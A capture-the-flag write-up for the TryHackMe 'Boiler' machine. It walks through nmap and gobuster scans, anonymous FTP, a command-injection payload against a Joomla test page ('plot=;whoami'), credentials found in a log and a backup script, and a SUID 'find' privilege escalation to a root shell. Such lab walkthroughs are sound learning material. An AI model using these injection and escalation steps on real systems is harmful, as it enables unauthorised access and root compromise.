Boiler CTF TryHackMe

TASK 1 : ENUMERATION

  • NMAP:
$ nmap -sC -sV 10.10.32.78  -oN nmapStarting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 16:55 IST
Nmap scan report for 10.10.32.78
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.82.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.56 seconds
$ ftp 10.10.32.78
  • l -means to give the output in list format
  • a -means to show all the files including chown and hidden one.

Task 1–1:

txt

Task 1–2:

nmap -p- <machine ip>

Task 1–3:

In the nmap you see 
10000/tcp open http MiniServ 1.930 (Webmin httpd)
webmin is running

Task 1–4:

Google the exploit of webmin. On checking it, you will find their in no exploit available for that version of service. The service is up to date.
$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
Just wanted to see if you find it. Lol. Remember: Enumeration is the key!
  • Gobuster
gobuster dir -u http://10.10.32.78/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,xml  -t 100   2>\dev\null===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.32.78/
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,xml,php,html
[+] Timeout: 10s
===============================================================
2020/08/16 17:51:00 Starting gobuster
===============================================================
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)
User-agent: *
Disallow: /

/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK
99b0660cd95adea327c54182baa51584
kidding

Task 1–5:

So as you google joomla you got that joomla is CMS.
So your answer for this is "joomla"
gobuster dir -u http://<ip>/joomla  -w /usr/share/dirb/wordlists/common.txt -t 50[+] Url:            http://10.10.2.36/joomla
[+] Threads: 50
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/16 20:43:44 Starting gobuster
===============================================================
/_files (Status: 301)
/_test (Status: 301)
/~www (Status: 301)
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/_archive (Status: 301)
/_database (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/installation (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/index.php (Status: 200)
/templates (Status: 301)
/tests (Status: 301)
/tmp (Status: 301)
==================================================================
http://<ipaddr>/index.php?plot=;<command-here> will execute
http://10.10.2.36/joomla/_test/index.php?plot=;whoami
When you click on select host you see in the last item you see the name of the user i.e www-data.

Task 1–6:

Here we find four but the different one log.txt.
So the answer is log.txt
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$

Task 2: POST Enumeration

TASK 2–1 :

$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATEif [ -d "$SOURCE" ]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOG
if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
done
elseecho "Directory is not present" >> $LOG
exit 0
fi
answer is: backup

Task 2–2:

stoner@Vulnerable:~$ ls -la
total 20
drwxr-x--- 4 stoner stoner 4096 Aug 16 19:13 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
drwx------ 2 stoner stoner 4096 Aug 16 19:13 .cache
drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret
stoner@Vulnerable:~$ cat .secret 
You made it till here, well done.
You made it till here, well done.

Task 2 Privilege Escalation:

find / -perm -u=s 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap

Task 2–3:

So the answer for this is - find
find . -exec /bin/sh -p \; -quit

Task 2–4:

# cd /root              
# ls
root.txt
# cat root.txt
It wasn't that hard, was it?
It wasn't that hard, was it?

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store